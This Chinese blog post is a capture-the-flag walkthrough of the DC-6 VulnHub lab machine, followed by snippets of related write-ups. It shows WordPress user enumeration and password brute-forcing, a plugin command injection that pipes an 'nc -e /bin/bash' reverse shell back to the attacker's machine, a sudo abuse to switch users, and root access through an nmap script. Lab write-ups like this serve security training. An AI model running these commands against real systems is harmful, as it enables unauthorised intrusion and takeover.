DC-6靶机详细渗透过程

最新推荐文章于 2025-04-17 11:54:24 发布
最新推荐文章于 2025-04-17 11:54:24 发布
阅读量1k 收藏 4
点赞数 3
分类专栏: 教程 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/MRS_jianai/article/details/128402204
版权

1.靶机部署

kali安装:https://blog.youkuaiyun.com/l2872253606/article/details/123592717?spm=1001.2014.3001.5502
靶机下载:https://www.five86.com/downloads/DC-6.zip
解压后得到一个.ova的文件:
image.png
使用VMware打开该文件:
image.png
设置好名称和虚拟机位置:
注意:导入过程中可能会提示导入失败,点击重试即可。
image.png
导入成功,打开虚拟机,到此虚拟机部署完成!
image.png
注意:靶机的网络连接模式必须和kali一直,让DC靶机跟kali处于同一网段,这用kali才能扫出DC的主机。

2.信息收集

2.1 IP扫描

使用nmap扫描同一个段下存活的IP,发现148开启了80端口

nmap 192.168.11.0/24

image.png
那么这个应该就是我们的靶机,在浏览器访问一下:
image.png
发现无法访问,并且地址栏出现了网站的域名,猜测应该是网站做了重定向,那我们在host文件里面添加一下IP和域名:

host文件位置:C:\Windows\System32\drivers\etc
192.168.11.148 wordy

image.png
image.png
再次访问就可以访问网站了:
image.png
kali的host文件在etc文件夹:
image.png
跟Windows一样,添加IP和域名
image.png

2.2 其他信息收集

扫描靶机开放的端口:

nmap -A -T4 -p- 192.168.11.148

image.png
使用插件查看网站CMS:

插件名称:Wappalyzer

image.png
敏感目录扫描:

dirb http://192.168.11.148

image.png

3.渗透过程

我们刚刚通过扫描敏感目录,发现了一个状态码为200,意思是可达的地址,访问发现是一个登录页面:

http://192.168.11.148/wp-admin/

image.png

扫描用户名

并且我们知道网站的CMS是word press,那我们就可以尝试使用wpscan扫描一下用户名:

wpscan --url wordy -e u

image.png
得到五个用户名,保存下来:
image.png

得到密码字典

当我们像DC-2一样扫描密码时,发现不可以:
image.png
这时候我们想起了作者的提示:
image.png
使用作者的提示生成一个密码字典:

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

image.png
有了用户名字典和密码字典,我们来爆破一下:

用户名:mark
密码:helpdesk01

image.png
登录:
image.png

漏洞发现

大概浏览页面之后,发现有个插件:
image.png
回想起刚开始看见页面的时候:
image.png
不知道什么意思?那停下来好好想想吧!!!

反弹shell-1

使用kali查找一下插件Activity monitor的漏洞:

searchsploit Activity monitor

image.png
发现了两个关于word press的漏洞,我们一个一个进行尝试,先尝试45274.html,将脚本下载下来,并查看其内容:

searchsploit -m 45274.html

image.png
查看内容,漏洞形式为PoC,并且存在CSRF(跨站请求伪造)漏洞 ,大概知道该脚本可以反弹shell。
没看出来???那可能是你打的靶场少,现在你就记住了!

cat 45274.html

image.png
修改内容,第一段为网站的域名,第二段为nc反弹shell的代码,其中IP地址为kali的IP
image.png
kali端打开nc监听:
image.png
文件修改好之后,在浏览器中访问此文件:
image.png
然后你就可以发现反弹shell成功了!!!
image.png

反弹shell-2

除上面的方法之外,还有其他可以反弹shenll的方式:
可以看到这里要求我们输入一个IP地址,那是否可以执行其他命令呢?
image.png
拼接ls命令试一下,发现可以执行,那我们是否可以考虑执行反弹shell命令:
image.png
拼接反弹shell命令:
记得卡里先开启监听
image.png
输入命令:

127.0.0.1 | nc -e /bin/bash 192.168.11.128 4444

注意:这里输入框的大小可能不够,需要打开开发者模式从源码修改文本框的大小,如果看不懂html代码,建议回炉重造!!!!
image.png
反弹成功!!!
image.png
生成交互式shell:

python -c “import pty;pty.spawn(‘/bin/bash’)”

image.png

发现用户名和密码

大概浏览文件:
在/home/mark/stuff目录下发现things-to-do.txt文件,其中有一名用户和密码:

用户名:graham
密码:GSo7isUM1D4

image.png
直接使用ssh连接:

ssh graham@192.168.11.148

image.png

提权

查看有限权限:

sudo -l

image.png
发现graham可以用jens的身份执行 /home/jens/backups.sh,那么如果把 /bin/bash追加到这个文件,然后用jens的身份执行这个文件的时候就会打开一个具有jens权限的shell

cd /home/jens
echo ‘/bin/bash’ >> backups.sh
sudo -u jens ./backups.sh

image.png
切换到jens用户后查看权限,发现jens可以使用root权限的nmap:
image.png
nmap在早期版本是可以用来提权的,我们来尝试一下nmap提权。将提权代码 os.execute(“/bin/sh”)写入一个文件中:

echo “os.execute(‘/bin/bash’)” > getshell

然后以root的权限用nmap执行这个脚本:

sudo nmap --script=getshell

image.png
注意:这里好像有个bug,提权后输入的命令不显示,只管输入直接回车就好了!!!

夺旗!

image.png

DC-6靶机进行渗透测试
zll___的博客
03-20 1042
DC-6靶机进行渗透测试
VulnHub靶机 DC-9 靶机 详细渗透过程
网络空间安全学习
04-27 3291
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
DC-6靶机渗透
m0_62008601的博客
05-31 660
攻击机kali:192.168.56.102 靶机dc-6:192.168.56.107 为确保两台服务器在同一网段下,我这里dc-6的网络设置为仅主机网络,kali的设置为桥接模式,这样才能通过kali扫描出dc-6靶机的ip。 配置好环境之后就可以开始操作了 扫描存活的主机 扫描靶机开放的端口 看到开放了80端口和22端口,浏览器进行访问 无法访问,这个问题和前面的一个靶机类似,存在域名解析错误,知道了域名为wordy,就可以去hosts文件(在/etc/hosts).
DC-6 靶机渗透实战笔记
最新发布
syg6921008的博客
04-17 749
信息收集与初始突破:通过域名识别和 WordPress 渗透实现初始访问。用户口令弱点与爆破:WordPress 用户弱口令爆破拿下后台访问权限。插件漏洞利用:借助插件中命令注入实现 RCE 并反弹 shell。横向移动与文件分析:利用残留文件中的账号信息,实现横向用户转换。脚本配置不当:通过备份脚本反弹 shell 到 jens 用户。Nmap NSE 脚本提权:利用 sudo 权限下的 Nmap 执行恶意 Lua 脚本获得 root shell。此靶机综合考查了。
DC6-靶机渗透
banacyo14206的博客
08-22 601
靶场下载链接: Download: http://www.five86.com/downloads/DC-6.zip Download (Mirror): https://download.vulnhub.com/dc/DC-6.zip Download (Torrent): https://download.vulnhub.com/dc/DC-6.zip.torrent ( ...
【渗透项目】靶机DC-6渗透过程
命运的旋律的博客
05-05 814
信息收集 主机发现 nmap -sn 192.168.189.0/24 端口扫描 nmap -sT -v -A 192.168.72.158 --script=vuln 发现开放了80端口,尝试用浏览器对该站点进行访问 该网站应该做了访问限制,只能通过域名的方式访问,但因为本地hosts中缺少对应的IP,导致域名解析失败而无法进行访问,解决办法是在hosts文件中写入对应域名和IP...
DC6-靶机
Au
10-30 1776
下载地址 下面是作者的提示,和爆破的字典有关 cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt 配置的环境: kali:192.168.25.131 DC6-靶机 和 kali 在同一C段 渗透 nmap扫描网段,发现存活主机 nmap -sP 192.168.25.0/...
vulnhub靶场 DC-1靶机 渗透详细过程
黑战士的博客
07-26 1342
1.扫描局域网主机netdiscover用法2.开放端口扫描2.MSF使用3.hydra爆破:sudo hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.0.100hydra+John密码包以上两种方式可以爆出flag4的密码4.suid提权:Linux下用SUID提权、find命令exec。
DC-4靶机提权超详细过程
02-29
### DC-4靶机提权超详细过程 #### 一、前言 本文将详细介绍如何在DC-4靶机上进行权限提升的过程,包括利用Kali Linux进行初始渗透测试、爆破登录凭证、获取敏感信息以及最终实现权限提升的具体步骤。通过本教程,...
DC-2靶机进行渗透测试
zll___的博客
03-11 1117
DC-2靶机进行渗透测试
DC-6靶机测试渗透详细教程
wwxxss
10-26 1407
DC-6靶场详细渗透过程
靶机DC-6
weixin_43940853的博客
11-27 1282
靶机 :192.168.230.231 kali : 192.168.230.226 一开始扫描到80和22 访问80,发现是wordpress,用wpscan扫出用户,根据作者的提示,得到密码字典,爆破 记一下这个linux命令 爆破出用户是mark,密码是helpdesk01,wordpress登录 其他wp上讲的是用msf会搜到一个关于activity monitor的ssrf漏洞,但...
渗透测试:DC-6靶机
Ciyaso的博客
08-21 349
一、扫描获取靶机ip arp-scan -l 192.168.203.145 二、获取网站信息 1.nmap nmap -sV -A 192.168.203.145 开放了22、80端口 访问主页,发现访问不了,和DC-2一样存在重定向,需要修改hosts文件 成功访问 2.Wappaloyzer CMS:WordPress 操作系统:Debian 数据库:Mysql Web服务器:Apache 2.4.25 3.wpscan 由于使用的是WordPress,所以我们使用wpsacn进行扫描
dc-6 靶机渗透学习
..
03-21 1849
信息收集 扫描当前网段,确定存活主机 nmap -sP 192.168.202.0/24 对靶机进行端口扫描,发现80、22端口开放 nmap -A -p- -v 192.168.202.145 访问80端口,发现和dc-2一样的问题,会自动跳转到域名,需要手动在hosts文件加入ip对应关系。 修改后重新访问80端口,用Wappalyzer扫描一下框架,发现是WordPress 根据靶机作者的提示,大致就知道是通过爆破来做 用专门的CM...
DC-6靶场渗透】
一纸荒芜的博客
01-16 1506
DC6靶场渗透
DC-6靶机
mlws1900的博客
03-26 1825
开放了一个http和ssh服务,用浏览器打开http服务,发现无法访问,和之前一样,去修改dns文件。登录地址(wordpress的后台地址,信息搜集,目录扫描,都做到这里了,不再做演示)发现可操作/home/jens/backups.sh,打开发现是一个解压的脚本。命令注入,打开bp进行抓包,在ip那一栏填上一个网址,点击lookup。不知道为什么,我这个shell不会显示我自己打的命令,所以需要自己盲打。设置网络为nat模式,启动打开时,发现错误直接重试和点是。看了大佬的wp,发现提示写在人家官网。
DC-6靶机渗透测试
读书 买花 长大
04-22 537
DC-6
DC-6靶机渗透测试过程(个人学习)
m0_59028058的博客
10-24 942
可以得到六个用户名,将他们保存到 usr.txt 文件中,再利用我们自己的字典对其进行爆破,但是需要一个比较大的字典才会有破解的可能性。在我们下载镜像靶场的时候,作者其实已经对我们进行了提示,存在着一个字典,可能会帮助我们减少很多时间,所以可以直接利用自带的字典进行爆破。可以得到该靶机开放了22端口和80端口,直接访问80端口是访问不上的,这里和 DC-2 靶场一样,存在一个无法重定向的问题,所以我们修改一下 hosts 文件即可。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小秋LY

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值